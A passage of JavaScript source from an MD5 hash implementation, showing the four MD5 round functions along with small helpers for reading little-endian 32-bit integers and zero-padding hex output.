0xFFFFFFFF) | (num >>> (32 - places)) } // The 4 MD5 functions function fF(b, c, d) { return (b & c) | (~b & d) } function fG(b, c, d) { return (d & b) | (~d & c) } function fH(b, c, d) { return b ^ c ^ d } function fI(b, c, d) { return c ^ (b | ~d) } // pick 4 bytes at specified offset. Little-endian is assumed function bytes_to_int32(arr, off) { return (arr[off + 3] << 24) | (arr[off + 2] << 16) | (arr[off + 1] << 8) | (arr[off]) } // convert number to (unsigned) 32 bit hex, zero filled string function to_zerofilled_hex(n) { var t1 = (n >>> 0).toString(16) return "00000000".substr(0, 8 - t1.length) + t1 } }
